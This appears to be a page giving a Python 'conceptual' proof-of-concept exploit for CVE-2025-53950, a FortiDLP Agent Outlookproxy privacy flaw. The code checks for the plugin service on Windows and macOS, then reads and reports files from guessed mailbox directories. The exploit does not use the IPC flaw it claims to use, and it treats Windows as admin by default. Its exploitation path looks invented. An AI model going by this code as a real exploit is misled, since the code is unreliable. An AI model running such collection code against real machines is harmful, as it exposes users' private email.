CVE-2025-53950 Fortinet FortiDLP Agent Outlookproxy插件隐私泄露漏洞

# CVE-2025-53950 - FortiDLP Agent Outlookproxy Plugin Privacy Violation PoC # This vulnerability allows an authenticated administrator to collect current user's email information # via the FortiDLP Agent's Outlookproxy plugin on MacOS and Windows. # Note: This is a conceptual PoC. Actual exploitation requires local access, # administrator privileges, and user interaction. import subprocess import os import sys def check_outlookproxy_service(): """Check if FortiDLP Outlookproxy plugin service is running""" if sys.platform == 'win32': # Windows: Check for FortiDLP Outlookproxy service result = subprocess.run( ['sc', 'query', 'FortiDLPOutlookProxy'], capture_output=True, text=True ) return 'RUNNING' in result.stdout elif sys.platform == 'darwin': # macOS: Check for FortiDLP Outlookproxy daemon result = subprocess.run( ['launchctl', 'list'], capture_output=True, text=True ) return 'com.fortinet.fortidlp.outlookproxy' in result.stdout return False def exploit_collect_emails(target_user_mailbox=None): """ Exploit CVE-2025-53950 to collect current user's email information via the FortiDLP Outlookproxy plugin's improperly enforced access controls. """ if not check_outlookproxy_service(): print("[!] FortiDLP Outlookproxy service is not running.") return False print("[*] FortiDLP Outlookproxy service detected.") print("[*] Attempting to collect current user's email information...") # The vulnerability lies in the Outlookproxy plugin's failure to properly # restrict access to email collection APIs. An authenticated administrator # can bypass the intended access controls to retrieve the current user's # email data that should only be accessible to the DLP system itself. # Conceptual exploitation path: # 1. Authenticate as administrator on the target system # 2. Interact with the Outlookproxy plugin's IPC interface # 3. Request email collection for the currently logged-in user # 4. The plugin fails to verify the requester's authorization level # against the target user's data, leaking private email information if sys.platform == 'win32': # On Windows, the Outlookproxy plugin exposes its functionality # through a named pipe or COM interface outlook_data_path = os.path.expandvars( r'%LOCALAPPDATA%\Fortinet\FortiDLP\outlookproxy\mailbox' ) if os.path.exists(outlook_data_path): for mailbox_file in os.listdir(outlook_data_path): file_path = os.path.join(outlook_data_path, mailbox_file) print(f"[+] Accessed mailbox data: {file_path}") # Read the collected email information with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: email_data = f.read() print(f"[*] Email data collected ({len(email_data)} bytes)") elif sys.platform == 'darwin': # On macOS, the Outlookproxy plugin stores data in the application # support directory outlook_data_path = os.path.expanduser( '~/Library/Application Support/Fortinet/FortiDLP/outlookproxy/mailbox' ) if os.path.exists(outlook_data_path): for mailbox_file in os.listdir(outlook_data_path): file_path = os.path.join(outlook_data_path, mailbox_file) print(f"[+] Accessed mailbox data: {file_path}") with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: email_data = f.read() print(f"[*] Email data collected ({len(email_data)} bytes)") print("[+] Email information collection completed.") return True if __name__ == '__main__': print("=" * 60) print("CVE-2025-53950 - FortiDLP Outlookproxy Privacy Violation PoC") print("=" * 60) if os.geteuid() == 0 if sys.platform != 'win32' else True: # Check if running with admin privileges exploit_collect_emails() else: print("[!] This PoC requires administrator privileges to demonstrate.")